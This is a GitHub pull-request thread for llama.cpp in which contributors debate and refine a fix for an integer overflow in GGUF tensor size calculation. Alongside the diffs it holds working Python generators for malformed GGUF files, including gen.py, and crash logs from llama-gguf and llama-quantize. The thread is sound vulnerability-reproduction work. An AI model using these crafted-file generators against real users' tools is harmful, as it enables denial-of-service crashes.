Fix integer overflow in GGUF tensor parsing by alexanderkent · Pull Request #18674 · ggml-org/llama.cpp

alexanderkent · 2026-01-07T18:42:16Z

This PR addresses a heap buffer overflow vulnerability caused by integer overflow in ggml_nbytes during GGUF tensor parsing.

Changes:

ggml/src/ggml.c: Added ggml_nbytes_safe() with checked arithmetic that returns SIZE_MAX on overflow.
ggml/src/gguf.cpp: Added strict validation in gguf_init_from_file_impl to reject tensors where byte size overflows.
ggml/include/ggml.h: Declared ggml_nbytes_safe() API.

Impact:
Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

This PR addresses a heap buffer overflow vulnerability caused by integer overflow in ggml_nbytes during GGUF tensor parsing. Changes: - ggml/src/ggml.c: Added ggml_nbytes_safe() with checked arithmetic that returns SIZE_MAX on overflow. - ggml/src/gguf.cpp: Added strict validation in gguf_init_from_file_impl to reject tensors where byte size overflows. - ggml/include/ggml.h: Declared ggml_nbytes_safe() API. Impact: Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

JohannesGaessler · 2026-01-07T18:47:06Z

Mitigates potential RCE via malicious GGUF files.

How would one do that? Was "AI" used for this PR?

ServeurpersoCom · 2026-01-07T19:29:08Z

Let's not be alarmist here. It would be helpful to publish the malformed GGUF example. This is a buffer overflow, not an RCE (the R stands for Remote), and turning it into a genuine ACE (Arbitrary Code Execution: Local exploit) would require significant expertise and bypassing modern OS protections (ASLR, DEP/NX, stack canaries, etc.). So let's fix this local buffer overflow in a minimalist way :) I tested the patch, no regressions, but I think we can make it simpler.

JohannesGaessler

This PR is needlessly complicated, we already have a check that the number of elements is representable as int64_t, it's enough to just do an equivalent check afterwards for the size in bytes and size_t. Also add a corresponding test to test-gguf.cpp. I don't see how a potential overflow in ggml_nbytes could be exploited in terms of security.

Removed redundant inline overflow checks from stride calculations. The ggml_nbytes_safe() call before allocation handles all overflow scenarios, making the earlier checks unnecessary.

ServeurpersoCom · 2026-01-07T20:12:47Z

Like this one ?

(root|~/llama.cpp.pascal) git diff 86ec8a55964de893229209b320367a461d03eb86
diff --git a/ggml/src/ggml.c b/ggml/src/ggml.c
index 09b8eb466..7845c2cb2 100644
--- a/ggml/src/ggml.c
+++ b/ggml/src/ggml.c
@@ -1235,6 +1235,26 @@ int64_t ggml_nrows(const struct ggml_tensor * tensor) {
     return tensor->ne[1]*tensor->ne[2]*tensor->ne[3];
 }

+static inline bool ggml_size_add_overflow(size_t a, size_t b, size_t * result) {
+    if (a > SIZE_MAX - b) {
+        return true;
+    }
+    *result = a + b;
+    return false;
+}
+
+static inline bool ggml_size_mul_overflow(size_t a, size_t b, size_t * result) {
+    if (a == 0 || b == 0) {
+        *result = 0;
+        return false;
+    }
+    if (a > SIZE_MAX / b) {
+        return true;
+    }
+    *result = a * b;
+    return false;
+}
+
 size_t ggml_nbytes(const struct ggml_tensor * tensor) {
     for (int i = 0; i < GGML_MAX_DIMS; ++i) {
         if (tensor->ne[i] <= 0) {
@@ -1247,13 +1267,25 @@ size_t ggml_nbytes(const struct ggml_tensor * tensor) {
     if (blck_size == 1) {
         nbytes = ggml_type_size(tensor->type);
         for (int i = 0; i < GGML_MAX_DIMS; ++i) {
-            nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
+            size_t add;
+            if (ggml_size_mul_overflow((size_t) (tensor->ne[i] - 1), tensor->nb[i], &add) ||
+                ggml_size_add_overflow(nbytes, add, &nbytes)) {
+                GGML_ABORT("%s: tensor byte size overflow", __func__);
+            }
         }
     }
     else {
-        nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
+        size_t base;
+        if (ggml_size_mul_overflow((size_t) tensor->ne[0], tensor->nb[0], &base)) {
+            GGML_ABORT("%s: tensor byte size overflow", __func__);
+        }
+        nbytes = base / blck_size;
         for (int i = 1; i < GGML_MAX_DIMS; ++i) {
-            nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
+            size_t add;
+            if (ggml_size_mul_overflow((size_t) (tensor->ne[i] - 1), tensor->nb[i], &add) ||
+                ggml_size_add_overflow(nbytes, add, &nbytes)) {
+                GGML_ABORT("%s: tensor byte size overflow", __func__);
+            }
         }
     }

This patch just adds two inline helpers that check if multiplication or addition would overflow before doing them, then aborts cleanly if they would: keeps it surgical in ggml_nbytes() without touching anything else.

ServeurpersoCom · 2026-01-07T20:24:30Z

I'm checking I think we can make it even simpler, earlier in the loader !!!!

ServeurpersoCom · 2026-01-07T20:32:40Z

We can do it here, with the other checks :

diff --git a/ggml/src/gguf.cpp b/ggml/src/gguf.cpp
index b165d8bdc..5cd11ba46 100644
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,16 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const uint64_t ne_total = (uint64_t)info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            const uint64_t bytes_total = ne_total * type_size / blck_size;
+            if (bytes_total > SIZE_MAX) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow (%" PRIu64 " bytes > SIZE_MAX)\n",
+                    __func__, info.t.name, bytes_total);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

JohannesGaessler · 2026-01-07T20:34:16Z

Just check whether ggml_nelements(...)/ggml_blck_size(...) <= SIZE_MAX/ggml_type_size(...), the variant you have is more susceptible to overflows.

ServeurpersoCom · 2026-01-07T20:37:32Z

Yes! divides before multiplying to avoid intermediate overflow in the calculation itself :

--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

ServeurpersoCom · 2026-01-07T21:05:40Z

(.venv) (root|~/evil) ls
bof3d.py  gemma-3-1b-it-Q8_0.gguf
(.venv) (root|~/evil) nano bof2d.py
(.venv) (root|~/evil) nano bof2d.py
(.venv) (root|~/evil) python3 bof2d.py gemma-3-1b-it-Q8_0.gguf bof-gemma-3-1b-it-Q8_0.gguf
Target tensor #1: token_embd.weight
Original shape: [  1152 262144]
GGUF v3
Patched dim[1]: 262144 -> 4398046511105 (2^42+1)
This triggers: (2^42) * stride = 2^64 overflow wrap to 0
Created: bof-gemma-3-1b-it-Q8_0.gguf (1069306400 bytes)
(.venv) (root|~/evil) ../llama.cpp.pascal/build/bin/llama-cli --model ~/evil/bof-gemma-3-1b-it-Q8_0.gguf -n 1 -p "test"
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... |gguf_init_from_file_impl: tensor 'blk.0.attn_k.weight' has offset 320868864, expected 5383208929597152
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from /root/evil/bof-gemma-3-1b-it-Q8_0.gguf
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
gguf_init_from_file_impl: tensor 'blk.0.attn_k.weight' has offset 320868864, expected 5383208929597152
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from /root/evil/bof-gemma-3-1b-it-Q8_0.gguf
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model '/root/evil/bof-gemma-3-1b-it-Q8_0.gguf'
srv    load_model: failed to load model, '/root/evil/bof-gemma-3-1b-it-Q8_0.gguf'
Failed to load the model
(.venv) (root|~/evil)

has offset 320868864, expected 5383208929597152

~~I reproduced~~ -> It's a clean exit !

(.venv) (root|~/evil) cat bof2d.py
#!/usr/bin/env python3
import sys
from gguf import GGUFReader
import struct

def patch_gguf_overflow(input_file, output_file):
    # Parse GGUF
    reader = GGUFReader(input_file)
    tensors = list(reader.tensors)

    # Find first tensor with 2+ dimensions
    target_idx = None
    for i, t in enumerate(tensors):
        if len(t.shape) >= 2:
            target_idx = i
            break

    if target_idx is None:
        print("ERROR: no tensor with 2+ dimensions found")
        return

    target = tensors[target_idx]
    dim_idx = 1  # Patch dimension 1 for 2D tensors

    print(f"Target tensor #{target_idx}: {target.name}")
    print(f"Original shape: {target.shape}")

    # Load file
    with open(input_file, 'rb') as f:
        data = bytearray(f.read())

    # Parse header
    version = struct.unpack('<I', data[4:8])[0]
    print(f"GGUF v{version}")

    # Find tensor by name
    target_name = target.name.encode('utf-8')
    name_offset = data.find(struct.pack('<Q', len(target_name)) + target_name, 1000)

    if name_offset == -1:
        print("ERROR: tensor not found")
        return

    # Parse tensor header
    offset = name_offset
    name_len = struct.unpack('<Q', data[offset:offset+8])[0]
    offset += 8 + name_len
    n_dims = struct.unpack('<I', data[offset:offset+4])[0]
    offset += 4

    if dim_idx >= n_dims:
        print(f"ERROR: dim_idx {dim_idx} >= n_dims {n_dims}")
        return

    # Patch dimension with 2^42 + 1
    evil_value = 4398046511105
    patch_offset = offset + (dim_idx * 8)
    old_val = struct.unpack('<Q', data[patch_offset:patch_offset+8])[0]
    struct.pack_into('<Q', data, patch_offset, evil_value)

    print(f"Patched dim[{dim_idx}]: {old_val} -> {evil_value} (2^42+1)")
    print(f"This triggers: (2^42) * stride = 2^64 overflow wrap to 0")

    # Write
    with open(output_file, 'wb') as f:
        f.write(data)

    print(f"Created: {output_file} ({len(data)} bytes)")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python3 bof.py input.gguf [output.gguf]")
        sys.exit(1)

    patch_gguf_overflow(
        sys.argv[1],
        sys.argv[2] if len(sys.argv) > 2 else 'evil_' + sys.argv[1].split('/')[-1]
    )
(.venv) (root|~/evil)

ServeurpersoCom · 2026-01-07T21:10:58Z

OK I need to patch a model with a 3D or 4D tensor?

ServeurpersoCom · 2026-01-07T21:29:32Z

Even the MoE have 3D, I didn't notice LLM with 4D tensors

(.venv) (root|~/evil) python3 bof4d.py Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf bof-qwen.gguf
ERROR: no tensor with 4 dimensions found
(.venv) (root|~/evil) python3 << 'EOF'
from gguf import GGUFReader
r = GGUFReader('Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf')
shapes = {}
for t in r.tensors:
    ndim = len(t.shape)
    if ndim not in shapes:
        shapes[ndim] = []
    shapes[ndim].append((t.name, t.shape))

for ndim in sorted(shapes.keys()):
    print(f"\n{ndim}D tensors: {len(shapes[ndim])}")
    for name, shape in shapes[ndim][:3]:
        print(f"  {name}: {shape}")
EOF

1D tensors: 193
  output_norm.weight: [2048]
  blk.0.attn_k_norm.weight: [128]
  blk.0.attn_norm.weight: [2048]

2D tensors: 242
  output.weight: [  2048 151936]
  token_embd.weight: [  2048 151936]
  blk.0.attn_k.weight: [2048  512]

3D tensors: 144
  blk.0.ffn_down_exps.weight: [ 768 2048  128]
  blk.0.ffn_gate_exps.weight: [2048  768  128]
  blk.0.ffn_up_exps.weight: [2048  768  128]
(.venv) (root|~/evil) ls
bof2d.py  bof3d.py  bof4d.py  Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf
(.venv) (root|~/evil) python3 bof3d.py Qwen3-30B-A3B-Instruct-2507-UD-Q8_K_XL.gguf bof-qwen.gguf
Target tensor #10: blk.0.ffn_down_exps.weight
Original shape: [ 768 2048  128]
GGUF v3
Patched dim[2]: 128 -> 4398046511105 (2^42+1)
This triggers: (2^42) * stride = 2^64 overflow wrap to 0
Created: bof-qwen.gguf (35989944736 bytes)
(.venv) (root|~/evil) ../llama.cpp.pascal/build/bin/llama-cli --model bof-qwen.gguf -n 1 -p "test"
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... -gguf_init_from_file_impl: tensor 'blk.0.ffn_gate_exps.weight' has offset 1677214720, expected 13835058056559870976
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from bof-qwen.gguf
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
gguf_init_from_file_impl: tensor 'blk.0.ffn_gate_exps.weight' has offset 1677214720, expected 13835058056559870976
gguf_init_from_file_impl: failed to read tensor data
llama_model_load: error loading model: llama_model_loader: failed to load model from bof-qwen.gguf
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model 'bof-qwen.gguf'
srv    load_model: failed to load model, 'bof-qwen.gguf'
Failed to load the model
(.venv) (root|~/evil)

it's a clean exit, master without patch, no buffer overflow, this clean exit does not invalidate the arithmetic issue itself. My repro only patches an existing GGUF and therefore fails early on offset validation; reaching the ggml_nbytes overflow would likely require generating a fully coherent GGUF from scratch.

ngxson · 2026-01-08T00:20:59Z

Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

Could you provide a working PoC for such attack?

alexanderkent · 2026-01-08T00:48:59Z

Prevents heap-based buffer overflow where ggml_nbytes wraps around due to integer overflow. Mitigates potential RCE via malicious GGUF files.

Could you provide a working PoC for such attack?

Worst-case scenario (realistic):
Crash/DoS: Most likely outcome - process segfaults when accessing unmapped memory.
Information disclosure: Possible if attacker can influence what's read from heap
Code execution: Theoretically possible but requires: (1) heap feng shui to position controlled data, (2) bypassing ASLR/DEP/NX/stack canaries, (3) finding usable gadgets...

ServeurpersoCom · 2026-01-08T02:39:51Z

Repro input would really help here. For GGUF parsing (or any file/param input) issues, I think we should require at least a minimal crashing sample (DoS-level, shared privately with maintainers (?)). That allows us to add a regression test and validate a minimal fix (crash before -> no crash after) instead of discussing theoretical exploitability. I can test any provided samples in a hardened VM on a dedicated machine without problem!

alexanderkent · 2026-01-08T03:16:01Z

Repro input would really help here. For GGUF parsing (or any file/param input) issues, I think we should require at least a minimal crashing sample (DoS-level, shared privately with maintainers (?)). That allows us to add a regression test and validate a minimal fix (crash before -> no crash after) instead of discussing theoretical exploitability. I can test any provided samples in a hardened VM on a dedicated machine without problem!

I've attached overflow_poc.gguf.zip (112 bytes) - a minimal GGUF file with crafted dimensions that trigger integer overflow in ggml_nbytes.

To reproduce:

# Checkout pre-fix commit
git checkout ef83fb860
# Build with ASAN (optional, for clearer output)
cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON
cmake --build build --target llama-gguf -j
# Test
./build/bin/llama-gguf overflow_poc.gguf r

Expected (unfixed):

tensor[0]: size = 4194304   ← wrapped from ~18 EB
zsh: segmentation fault

overflow_poc.gguf.zip

ServeurpersoCom · 2026-01-08T03:37:08Z

it's interesting now :

(.venv) (root|~/A) python3 << 'EOF'
from gguf import GGUFReader
try:
    r = GGUFReader('overflow_poc.gguf')
    print(f"Tensors: {len(r.tensors)}")
    for t in r.tensors:
        print(f"  {t.name}: {t.shape} type={t.tensor_type}")
except Exception as e:
    print(f"Error: {e}")
EOF
Error: cannot reshape array of size 4 into shape (1,4398046511105,1024,1024)

(.venv) (root|~/A) /root/llama.cpp.pascal/build/bin/llama-gguf overflow_poc.gguf r
gguf_ex_read_0: version:      3
gguf_ex_read_0: alignment:   32
gguf_ex_read_0: data offset: 96
gguf_ex_read_0: n_kv: 0
gguf_ex_read_0: find key: some.parameter.string not found.
gguf_ex_read_0: n_tensors: 1
gguf_ex_read_0: tensor[0]: name = overflow_tensor, size = 4194304, offset = 0
gguf_init_from_file_impl: failed to read tensor data binary blob
Erreur de segmentation

(.venv) (root|~/A) /root/llama.cpp.pascal/build/bin/llama-cli -m overflow_poc.gguf
ggml_cuda_init: found 1 CUDA devices:
  Device 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition, compute capability 12.0, VMM: yes

Loading model... |llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model 'overflow_poc.gguf'
srv    load_model: failed to load model, 'overflow_poc.gguf'
Failed to load the model
(.venv) (root|~/A)

ServeurpersoCom · 2026-01-08T03:42:22Z

With minimized patch :

(.venv) (root|~/llama.cpp.pascal) cat overflow.patch
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);
(.venv) (root|~/llama.cpp.pascal) ./build/bin/llama-gguf ../A/overflow_poc.gguf r
gguf_init_from_file_impl: tensor 'overflow_tensor' size overflow
gguf_init_from_file_impl: failed to read tensor info
gguf_ex_read_0: failed to load '../A/overflow_poc.gguf'
/root/llama.cpp.pascal/examples/gguf/gguf.cpp:265: GGML_ASSERT(gguf_ex_read_0(fname) && "failed to read gguf file") failed
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fa3cfef1bd3 in __GI___wait4 (pid=719270, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      ../sysdeps/unix/sysv/linux/wait4.c: Aucun fichier ou dossier de ce type.
#0  0x00007fa3cfef1bd3 in __GI___wait4 (pid=719270, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      in ../sysdeps/unix/sysv/linux/wait4.c
#1  0x00007fa3d034b71b in ggml_print_backtrace () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#2  0x00007fa3d034b86e in ggml_abort () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#3  0x0000563b7356f5e6 in main ()
[Inferior 1 (process 719269) detached]
Abandon
(.venv) (root|~/llama.cpp.pascal)

BEFORE:

llama-gguf: segfault (nbytes wrapped to 4MB instead of 18EB)
llama-cli: vague "data not within file bounds" (but NOT a BOF/DoS!)

AFTER:

llama-gguf: clean abort with "size overflow"
llama-cli: explicit "size overflow" message

9-line fix catches overflow early in loader, prevents segfault in llama-gguf and clarifies error in llama-cli

ServeurpersoCom · 2026-01-08T04:12:32Z

A working python generator to document/test :


(root|~/A) cat gen.py
#!/usr/bin/env python3
import struct
import sys

def generate_overflow_poc(output='overflow_poc.gguf'):
    """
    Generate minimal GGUF with integer overflow trigger.

    Tensor: [1024, 1024, 2^42+1, 1] shape causes:
      nb[2] = 4MB * 1024 = 4GB (2^22)
      (ne[2]-1) * nb[2] = 2^42 * 2^22 = 2^64 -> wraps to 0
    Result: ggml_nbytes() returns 4MB instead of 18 EB
    """

    data = bytearray()

    # Header
    data += b'GGUF'                          # magic
    data += struct.pack('<I', 3)             # version 3
    data += struct.pack('<Q', 1)             # tensor_count
    data += struct.pack('<Q', 0)             # metadata_count

    # Tensor info
    name = b'overflow_tensor'
    data += struct.pack('<Q', len(name))     # name_len
    data += name                             # name

    # Dimensions: [1024, 1024, 2^42+1, 1]
    data += struct.pack('<I', 4)             # n_dims
    data += struct.pack('<Q', 1024)          # ne[0]
    data += struct.pack('<Q', 1024)          # ne[1]
    data += struct.pack('<Q', 4398046511105) # ne[2] = 2^42 + 1
    data += struct.pack('<Q', 1)             # ne[3]

    # Type F32 (0) + offset
    data += struct.pack('<I', 0)             # type
    data += struct.pack('<Q', 0)             # offset = 0

    # Alignment padding to 32-byte boundary (0x60 = 96 bytes)
    while len(data) < 96:
        data += b'\x00'

    # Tensor data (deadbeef pattern - 16 bytes total)
    data += b'\xde\xad\xbe\xef' * 4          # 16 bytes of deadbeef

    with open(output, 'wb') as f:
        f.write(data)

    print(f"Generated {output} ({len(data)} bytes)")
    print(f"  Tensor: overflow_tensor")
    print(f"  Shape: [1024, 1024, 4398046511105, 1]")
    print(f"  Expected: 18 EB")
    print(f"  Wrapped: ~4 MB")

if __name__ == '__main__':
    output = sys.argv[1] if len(sys.argv) > 1 else 'overflow_poc.gguf'
    generate_overflow_poc(output)
(root|~/A) python3 gen.py
Generated overflow_poc.gguf (112 bytes)
  Tensor: overflow_tensor
  Shape: [1024, 1024, 4398046511105, 1]
  Expected: 18 EB
  Wrapped: ~4 MB
(root|~/A) xxd overflow_poc_original.gguf
00000000: 4747 5546 0300 0000 0100 0000 0000 0000  GGUF............
00000010: 0000 0000 0000 0000 0f00 0000 0000 0000  ................
00000020: 6f76 6572 666c 6f77 5f74 656e 736f 7204  overflow_tensor.
00000030: 0000 0000 0400 0000 0000 0000 0400 0000  ................
00000040: 0000 0001 0000 0000 0400 0001 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: dead beef dead beef dead beef dead beef  ................
(root|~/A) xxd overflow_poc.gguf
00000000: 4747 5546 0300 0000 0100 0000 0000 0000  GGUF............
00000010: 0000 0000 0000 0000 0f00 0000 0000 0000  ................
00000020: 6f76 6572 666c 6f77 5f74 656e 736f 7204  overflow_tensor.
00000030: 0000 0000 0400 0000 0000 0000 0400 0000  ................
00000040: 0000 0001 0000 0000 0400 0001 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: dead beef dead beef dead beef dead beef  ................
(root|~/A)

And tested patch : ServeurpersoCom@c503651

ngxson · 2026-01-08T14:06:27Z

@alexanderkent I don't think the PoC is valid as-is, because you are intentionally using llama-gguf

When running with llama-server or llama-cli, it exits cleanly:

srv    load_model: loading model '../../Downloads/overflow_poc.gguf'
common_init_result: fitting params to device memory, for bugs during this step try to reproduce them with -fit off, or provide --verbose logs if the bug only occurs with -fit on
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
llama_params_fit: encountered an error while trying to fit params to free device memory: failed to load model
llama_params_fit: fitting params to free memory took 0.00 seconds
llama_model_load_from_file_impl: using device Metal (Apple M3 Max) (unknown id) - 27647 MiB free
llama_model_load: error loading model: tensor 'overflow_tensor' data is not within the file bounds, model is corrupted or incomplete
llama_model_load_from_file_impl: failed to load model
common_init_from_params: failed to load model '../../Downloads/overflow_poc.gguf'
srv    load_model: failed to load model, '../../Downloads/overflow_poc.gguf'
srv    operator(): operator(): cleaning up before exit...
main: exiting due to model loading error

I don't believe this is a valid vulnerability in GGUF or GGML library. It's just the downstream code misses the check for boundary. llama.cpp has such check, but llama-gguf doesn't have because it's a tool for debugging and testing, not for normal usage. We can add the check easily though.

ngxson · 2026-01-09T15:48:08Z

Closing because this is not a valid bug in GGML or libllama

JohannesGaessler · 2026-01-09T16:19:27Z

I would consider it a valid bug in gguf.cpp and I will review and approve a PR that adds a simple and self-contained check in gguf.cpp along with a corresponding test case in test-gguf.cpp.

alexanderkent · 2026-01-10T01:20:39Z

Thanks everyone for looking into this.

I respectfully disagree with closing this. Here's proof that the vulnerability affects production llama.cpp tools, not just debug tools:

Dimensions: [2147483648, 2147483648, 1, 1] (2^31 × 2^31)
Element count: 2^62 < INT64_MAX ✓ (passes element check)
Byte size: 2^64 > SIZE_MAX ✗ (overflows, causing allocation failure)

overflow_poc_friday.gguf.zip

Reproduction with llama-quantize (production tool)

# Build unfixed code with ASAN
git checkout ef83fb860
cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON
cmake --build build --target llama-quantize -j

# Run PoC
./build/bin/llama-quantize overflow_poc_friday.gguf out.gguf Q4_0

llama_model_loader: llama.vocab_size u32 = 2147483648
/src/llama-model-loader.cpp:912: GGML_ASSERT(cur->data != nullptr) failed
zsh: abort

Potential Root Cause

ggml_nbytes() in the GGML library overflows when calculating tensor size, returning 0 or a very small value. This causes:

Downstream code to allocate 0 bytes (or fail allocation)
NULL pointer dereference when accessing tensor data

The fix (ggml_nbytes_safe()) should likely be in the core library because:

Multiple production tools are affected (llama-quantize, llama-gguf) ( The existing bound check in llama-model-loader.h:41 uses ggml_nbytes() which returns the already-corrupted value — making the check ineffective
Any future tool using gguf_init_from_file() would inherit this vulnerability

ServeurpersoCom · 2026-01-10T07:49:59Z

I can reproduce with llama-quantize, though I understand there may be debate about whether this tool qualifies as a production utility or primarily a debugging tool.

(root|~/A) ./test_exploit.sh
[*] Testing with ASAN build...
main: build = 7749 (a75fd08e7)
main: built with GNU 12.2.0 for Linux x86_64
main: quantizing '/root/A/overflow_poc_friday.gguf' to '/tmp/out.gguf' as Q4_0
llama_model_loader: direct I/O is enabled, disabling mmap
llama_model_loader: loaded meta data with 18 key-value pairs and 1 tensors from /root/A/overflow_poc_friday.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv   0:                       general.architecture str              = llama
llama_model_loader: - kv   1:                               general.name str              = overflow_poc
llama_model_loader: - kv   2:                          llama.block_count u32              = 1
llama_model_loader: - kv   3:                       llama.context_length u32              = 2048
llama_model_loader: - kv   4:                     llama.embedding_length u32              = 2147483648
llama_model_loader: - kv   5:                 llama.attention.head_count u32              = 32
llama_model_loader: - kv   6:              llama.attention.head_count_kv u32              = 32
llama_model_loader: - kv   7:                       llama.rope.freq_base f32              = 10000.000000
llama_model_loader: - kv   8:     llama.attention.layer_norm_rms_epsilon f32              = 0.000010
llama_model_loader: - kv   9:                  llama.feed_forward_length u32              = 11008
llama_model_loader: - kv  10:                           llama.vocab_size u32              = 2147483648
llama_model_loader: - kv  11:                       tokenizer.ggml.model str              = llama
llama_model_loader: - kv  12:                      tokenizer.ggml.tokens arr[str,8]       = ["<unk>", "<s>", "</s>", "a", "b", "c...
llama_model_loader: - kv  13:                      tokenizer.ggml.scores arr[f32,8]       = [0.000000, 0.000000, 0.000000, 0.0000...
llama_model_loader: - kv  14:                  tokenizer.ggml.token_type arr[u32,8]       = [0, 0, 0, 0, 0, 0, 0, 0]
llama_model_loader: - kv  15:                tokenizer.ggml.bos_token_id u32              = 1
llama_model_loader: - kv  16:                tokenizer.ggml.eos_token_id u32              = 2
llama_model_loader: - kv  17:            tokenizer.ggml.unknown_token_id u32              = 0
llama_model_loader: - type  f32:    1 tensors
/root/llama.cpp.pascal/src/llama-model-loader.cpp:945: GGML_ASSERT(cur->data != nullptr) failed
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fd5c54f1bd3 in __GI___wait4 (pid=959807, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      ../sysdeps/unix/sysv/linux/wait4.c: Aucun fichier ou dossier de ce type.
#0  0x00007fd5c54f1bd3 in __GI___wait4 (pid=959807, stat_loc=0x0, options=0, usage=0x0) at ../sysdeps/unix/sysv/linux/wait4.c:30
30      in ../sysdeps/unix/sysv/linux/wait4.c
#1  0x00007fd5cb87d6ff in __interceptor_waitpid (pid=<optimized out>, status=0x0, options=<optimized out>) at ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:2518
2518    ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc: Aucun fichier ou dossier de ce type.
#2  0x00007fd5ca8a0aa4 in ggml_print_backtrace () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#3  0x00007fd5ca8a0d7b in ggml_abort () from /root/llama.cpp.pascal/build/bin/libggml-base.so.0
#4  0x00007fd5cb1c2c6a in llama_model_loader::load_data_for(ggml_tensor*) const () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#5  0x00007fd5cb352435 in llama_model_quantize_impl(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, llama_model_quantize_params const*) () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#6  0x00007fd5cb35c312 in llama_model_quantize () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#7  0x0000564b4671f763 in main ()
[Inferior 1 (process 959806) detached]
./test_exploit.sh : ligne 6 : 959806 Abandon                 ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 ./build/bin/llama-quantize ~/A/overflow_poc_friday.gguf /tmp/out.gguf Q4_0
[*] Exit code: 134

With my 2 day ago patch :

(root|~/llama.cpp.pascal) git diff
diff --git a/ggml/src/gguf.cpp b/ggml/src/gguf.cpp
index b165d8bdc..00e31a8e2 100644
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
